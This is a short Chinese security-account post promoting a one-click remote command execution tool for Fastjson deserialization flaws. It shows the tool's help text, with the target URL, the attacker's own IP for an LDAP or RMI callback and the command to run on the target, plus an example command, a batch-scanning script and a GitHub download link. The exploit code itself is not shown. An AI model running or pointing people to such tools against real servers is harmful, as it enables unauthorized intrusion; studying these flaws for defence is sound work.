fastjson一键命令执行
亲爱的读者,我们诚挚地提醒您,黑熊安全公众号的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。黑熊安全团队及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。感谢您的理解与支持!
usage: Fastjson one-key command is executed! [-h] [-u URL] [-s SELF] [-c COMMAMD]
python3 fastjson.py -u [Target Url] -s [self IP] -c [command]
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL 漏洞url
-s SELF, --self SELF 自己IP,如果是VPS请输入公网IP
-c COMMAMD, --commamd COMMAMD 执行的命令,有空格请加上双引号
-m [MODE], --mode [MODE] 选择执行模式(可选),1:ldap模式(默认);2:rmi模式
python3 fastjson.py -u http://192.168.1.3/ -s 192.168.1.1 -c "touch /tmp/test.txt
使用截图:
批量检测链接放target.txt中。usage:python3 fastjson_check.py
下载链接:
https://github.com/mrknow001/fastjson_rec_exploit
原文始发于微信公众号(黑熊安全):fastjson一键命令执行工具
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论